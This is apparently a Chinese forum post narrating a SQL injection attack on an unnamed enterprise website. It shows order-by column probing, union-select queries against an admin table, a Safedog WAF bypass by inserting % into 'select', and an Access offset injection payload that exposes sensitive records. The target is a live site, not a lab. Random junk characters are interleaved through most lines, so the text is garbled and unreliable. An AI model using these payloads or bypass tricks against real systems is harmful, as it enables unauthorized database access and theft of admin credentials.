打开网站,一个企业站。9 e+ P3 o. \3 I* K6 l6 N4 f
& d2 t& t) b; w h! b
* S8 b# X* \/ U5 C. ^9 M) ]顺手加个admin
2 T3 A7 p- X6 j b# u- ?6 R; ?' B2 p5 M2 V
4 U4 P9 j& }/ [# j" d* ^! k
默认后台。
$ a. z' N- O9 \; S: o) M回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。: X% q1 `. a$ V2 O4 W" z
7 E' o. ?+ P" D/ X) p$ B
# K/ Q& W: h' b- {6 \6 T
4 L1 @5 q( C* Q所以就不用御剑扫了,待会直接封IP。! i! R0 j+ V# ]7 d6 W4 J- I7 k
& h5 v- A! |8 ^2 Q, }0 x, r用order by语句判断是否存在注入。! L) v& B/ ^! i2 X1 e6 }6 c) u" ~
http://www.xxx.com /product_show.asp?id=997 order by 1! y) v& a Y4 Z: V$ J1 J( _" \# G! O
http://www.xxx.com /product_show.asp?id=997 order by 1006 x8 K8 c }9 `6 E8 y6 M$ L% ]
现在存在注入,经测试后发现是9个字段。$ i4 B$ i4 s+ ?3 d% w2 i
$ Y; u- X3 r8 m( y2 o! _
接下来进行联合查询,猜是否存在admin表。
% O# E1 @. F. y6 A1 ]+ Z! Lhttp://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。
2 ^0 `2 P8 w# s8 x5 q/ n, `/ K; }4 m5 z: T: I! @: [; |8 g
9 ]& S6 c" y/ }1 |8 w* ~5 Y
1 Y% s. m/ A6 ?% }. u/ X' I# R3 m在select中间加个%,se%lect绕过安全狗。
2 b, t5 v3 m6 L3 T/ T" [0 ^. @6 |6 ^
; C! _, `8 u: z8 N V6 y4 v+ {; ]5 e4 ^
发现存在admin表,然后开始手工猜常用的字段。
6 |0 P" ^( f5 m! M8 P6 f" h纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。
' ^ J1 y) c9 f$ k( w& C' H4 G/ F6 b
9 x4 _& p9 ?6 a+ b1 b/ o突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。
( u" u+ ^! E; M: q3 f9 F, @
: @2 L2 v- G3 ]1 z2 a科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。' Z7 D% U" M9 z7 C! t4 Z
http://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin
+ h" ~. K) [ S* {好了,敏感内容出显了。
; U3 u; z+ z$ d( b
" [( S: N( b8 j+ m- \. y) J/ A
; P( G6 I \4 W0 m( d$ F/ F% a* \! W
|